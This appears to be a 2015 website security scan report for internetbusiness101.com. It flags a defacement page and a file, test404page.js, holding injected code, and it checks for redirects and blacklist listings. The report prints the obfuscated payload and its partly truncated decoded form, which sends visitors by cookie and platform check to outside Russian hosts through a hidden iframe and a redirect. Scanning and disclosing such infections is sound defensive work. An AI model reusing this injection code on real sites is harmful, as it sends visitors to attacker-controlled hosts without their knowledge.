Scanned pages/files
Request | Server response | Status |
http://internetbusiness101.com/ | 200 OK Content-Length: 11887 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: You Got Hacked By A_Ghacker ...[703 bytes skipped]... root" /> <meta name="copyright" content="msfconsole_meta"/> <meta name="description" content="msfconsole_meta"/> <body oncontextmenu="return false" onkeydown="return false"> <script language="JavaScript"> function tb5_makeArray(n){ this.length = n; return this.length; } tb5_messages = new tb5_makeArray(5); tb5_messages[0] = "You Got Hacked By A_Ghacker"; tb5_messages[1] = "We are arab Hackers"; tb5_messages[2] = "We Love Hacking!"; tb5_messages[3] = "Gray Hat Hacker Here!"; tb5_messages[4] = "Don't Worry"; tb5_messages[5] = "Your DataBase Is Safe"; tb5_messages[6] = "We just want to inform you that your site security is low ."; tb5_messages[7] = "Fixed it as soon possible, or else other hacker will hacked your system !"; tb5_rptType = 'infinite'; tb5_rptNbr = 10; tb5_speed = ...[12070 bytes skipped]... | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://internetbusiness101.com/test404page.js | 200 OK Content-Length: 62110 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[622 bytes skipped]... Decoded script: ...[377 bytes skipped]... pVersion.indexOf("Win")==-1){ var _vu_u="47df99045433a8c590cfeb72d5dc6b9c", _vu_i="a78f966dbb4d07385d831dab60cd79e2"; if(_vr_c(_vu_u)===undefined){_vc_c(_vu_u,_vu_i,5); if(_vr_c(_vu_u)==_vu_i){window.location.href="http://mobi-auto.ru/m/";} }} function dpp(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif";}i=1;return;} <iframe onload="return dpp(this);" style="width:66%;height:66%;" src="about:blank"></iframe> </div> function _vr_c(k){return(document.cookie.match('(^|; )'+k+'=([^;]*)')||0)[2]} function _vc_c(name,value,d){var date=new Date();date.setTime(date.getTime()+(d*86400000) | ||
http://internetbusiness101.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://internetbusiness101.com/wp-content/plugins/gtranslate/jquery-translate.js?ver=3.5.1 | 200 OK Content-Length: 16301 Content-Type: application/javascript | clean |
http://internetbusiness101.com/wp-content/plugins/tubepress/src/main/web/js/tubepress.js?ver=3.5.1 | 200 OK Content-Length: 3832 Content-Type: application/javascript | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js | 200 OK Content-Length: 34843 Content-Type: application/javascript | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js.php | 200 OK Content-Length: 26810 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/scripts/ | 200 OK Content-Length: 940 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/ | 200 OK Content-Length: 833 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/README.txt | 200 OK Content-Length: 3425 Content-Type: text/plain | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/content-gallery.php | 200 OK Content-Length: 219 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/css/ | 200 OK Content-Length: 560 Content-Type: text/html | clean |
http://internetbusiness101.com/wp-content/plugins/featured-content-gallery/css/img/ | 200 OK Content-Length: 906 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: internetbusiness101.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 30 Sep 2015 01:52:29 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 11887
Content-Type: text/html
Last-Modified: Mon, 10 Aug 2015 14:13:42 GMT
...11887 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: internetbusiness101.com
Referer: http://www.google.com/search?q=internetbusiness101.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=internetbusiness101.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://internetbusiness101.com/
Result: internetbusiness101.com is not infected or malware details are not published yet.